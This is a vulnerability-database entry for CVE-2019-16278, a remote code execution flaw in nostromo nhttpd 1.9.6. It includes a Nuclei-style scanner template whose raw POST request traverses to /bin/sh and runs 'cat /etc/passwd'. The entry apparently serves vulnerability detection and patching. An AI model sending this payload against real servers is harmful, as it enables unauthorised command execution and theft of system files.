CVE-2019-16278: nostromo 1.9.6 - Remote Code Execution

2025-08-01 nostromo PoC Public

Description

nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.

PoC

id: CVE-2019-16278

info:
  name: nostromo 1.9.6 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via  directory traversal in the function http_verify.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.
  reference:
    - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
    - https://www.exploit-db.com/raw/47837
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16278
    - http://www.nazgul.ch/dev/nostromo_cl.txt
    - http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-16278
    cwe-id: CWE-22
    epss-score: 0.99033
    epss-percentile: 0.99929
    cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nazgul
    product: nostromo_nhttpd
  tags: cve,cve2019,edb,rce,packetstorm,nazgul,kev,vkev,vuln

http:
  - raw:
      - |
        POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
        Host: {{Hostname}}

        echo
        echo
        cat /etc/passwd 2>&1

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100ce61704d56472c73de27dee6ecc31237f3d97eea5c61a2698e286b9550ecf4d10220565fa099a34e8b8da7aed68ab8bb04c44bb2e93eeee305df6feff6f7fdbbf4ea:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities